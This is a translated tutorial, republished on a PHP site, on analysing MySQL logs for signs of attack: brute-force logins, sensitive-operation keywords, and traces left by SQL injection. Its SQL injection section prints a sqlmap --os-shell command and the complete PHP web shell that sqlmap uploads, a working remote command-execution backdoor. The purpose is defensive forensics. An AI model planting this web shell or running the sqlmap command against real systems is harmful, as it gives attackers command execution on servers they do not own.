How to analyze database logs

王林
Release: 2020-06-11 17:20:01
forward
3284 people have browsed it

How to analyze database logs

Common database attacks include weak passwords, SQL injection, elevated privileges, stolen backups, etc. By analyzing database logs, attack behaviors can be discovered, attack scenarios can be further restored, and attack sources can be traced.

1. Mysql log analysis

The general query log can record successful connections and each query executed. We can use it as part of security deployment to provide troubleshooting Provide the basis for analysis or post-hacking investigations.

1. View the log configuration information

show variables like '%general%';
Copy after login

2. Enable the log

SET GLOBAL general_log = 'On';
Copy after login

3. Specify the log file path

SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';
Copy after login

For example, when I access /test .php?id=1, at this time we get a log like this:

190604 14:46:14       14 Connect    root@localhost on
                      14 Init DB    test   
                      14 Query    SELECT * FROM admin WHERE id = 1     
                      14 Quit
Copy after login

Let’s parse it by column:

The first column: Time, the time column, the first one is the date, the last one is the date One is hours and minutes. Some of the reasons why they are not displayed are because these SQL statements are executed almost at the same time, so the time is not recorded separately.

The second column: Id is the thread ID in the first column of show processlist. For long connections and some time-consuming SQL statements, you can accurately find out which thread is running. .

The third column: Command, operation type, for example, Connect is to connect to the database, Query is to query the database (additions, deletions, checks and modifications are all displayed as queries), some operations can be specifically filtered.

The fourth column: Argument, detailed information, for example, Connect root@localhost on means to connect to the database, and so on, what query operations were performed after connecting to the database.

2. Login success/failure

Let’s do a simple test. Use the weak password tool I developed before to scan it. The dictionary setting is relatively small. , 2 users, 4 passwords, 8 groups in total.

How to analyze database logs

The log record in MySQL looks like this:

Time                 Id        Command         Argument
190601 22:03:20     98 Connect  root@192.168.204.1 on
        98 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)      
        103 Connect  mysql@192.168.204.1 on       
        103 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
        104 Connect  mysql@192.168.204.1 on       
        104 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
        100 Connect  root@192.168.204.1 on       
        101 Connect  root@192.168.204.1 on       
        101 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)       
        99 Connect  root@192.168.204.1 on        
        99 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)      
        105 Connect  mysql@192.168.204.1 on       
        105 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
        100 Query  set autocommit=0      
        102 Connect  mysql@192.168.204.1 on       
        102 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
        100 Quit
Copy after login

Do you know which one is successful in this password guessing process?

Using blasting tools, a successful password guessing record looks like this:

190601 22:03:20     100 Connectroot@192.168.204.1 on
   100 Queryset autocommit=0   
   100 Quit
Copy after login

However, if you use other methods, it may be a little different.

Navicat for MySQL login:

190601 22:14:07  106 Connectroot@192.168.204.1 on         
         106 QuerySET NAMES utf8
         106 QuerySHOW VARIABLES LIKE 'lower_case_%'         
         106 QuerySHOW VARIABLES LIKE 'profiling'         
         106 QuerySHOW DATABASES
Copy after login

Command line login:

190601 22:17:25  111 Connectroot@localhost on
         111 Queryselect @@version_comment limit 1
         190601 22:17:56  111 Quit
Copy after login

The difference is that different database connection tools have different processes in the initialization process of connecting to the database. . Through this difference, we can simply determine how the user connects to the database.

In addition, regardless of whether you use a blasting tool, Navicat for MySQL, or the command line, login failures will have the same record.

Login failure records:

102 Connect  mysql@192.168.204.1 on 
102 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
Copy after login

Use shell commands for simple analysis:

Which IPs are being blasted?

grep  "Access denied" mysql.log |cut -d "'" -f4|uniq -c|sort -nr
     27 192.168.204.1
Copy after login

What are the dictionaries of blasting usernames?

grep  "Access denied" mysql.log |cut -d "'" -f2|uniq -c|sort -
nr     13 mysql     12 root      1 root      1 mysql
Copy after login

In log analysis, special attention needs to be paid to some sensitive operations, such as deleting tables, preparing databases, reading and writing files, etc.

Keywords: drop table, drop function, lock tables, unlock tables, load_file(), into outfile, into dumpfile.
Sensitive database tables: SELECT * from mysql.user, SELECT * from mysql.func

3. Traces of SQL injection intrusion

Using SQL injection vulnerabilities During the process, we will try to use the --os-shell parameter of sqlmap to obtain the shell. If the operation is not careful, some temporary tables and custom functions created by sqlmap may be left behind. Let’s first take a look at the usage and principle of sqlmap os-shell parameters:

1. Construct a SQL injection point and enable Burp to listen to port 8080

sqlmap.py  -u http://192.168.204.164/sql.php?id=1 --os-shell --proxy=http://127.0.0.1:8080
Copy after login

The HTTP communication process is as follows:

How to analyze database logs

Creates a temporary file tmpbwyov.php, executes system commands by accessing this Trojan, and returns to the page display.

tmpbwyov.php:
<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set(&#39;max_execution_time&#39;,0);$z=@ini_get(&#39;disable_functions&#39;);if(!empty($z)){$z=preg_replace(&#39;/[, ]+/&#39;,&#39;,&#39;,$z);$z=explode(&#39;,&#39;,$z);$z=array_map(&#39;trim&#39;,$z);}else{$z=array();}$c=$c." 2>&1n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f(&#39;system&#39;)){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f(&#39;proc_open&#39;)){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f(&#39;shell_exec&#39;)){$w=shell_exec($c);}elseif(f(&#39;passthru&#39;)){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f(&#39;popen&#39;)){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f(&#39;exec&#39;)){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre class="brush:php;toolbar:false">".$w."
Copy after login
";?>`

Create a temporary table sqlmapoutput, call the stored procedure to execute system commands to write data into the temporary table, and then take the data from the temporary table and display it to the front end.

By checking the recently created suspicious files in the website directory, you can determine whether a SQL injection vulnerability attack has occurred.

Checking method:

1. Check whether there are some Trojan files in the website directory:

How to analyze database logs

2. Check whether there is a UDF file Rights and MOF privilege escalation traces

Check whether there are abnormal files in the directory

mysqllibpluginc:/windows/system32/wbem/mof/
Copy after login

Check whether the function is deleted

select * from mysql.func
Copy after login

3. Combine with web log analysis.

Recommended tutorial: Web server security

The above is the detailed content of How to analyze database logs. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:secpulse.com
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template
About us Disclaimer Sitemap
php.cn:Public welfare online PHP training,Help PHP learners grow quickly!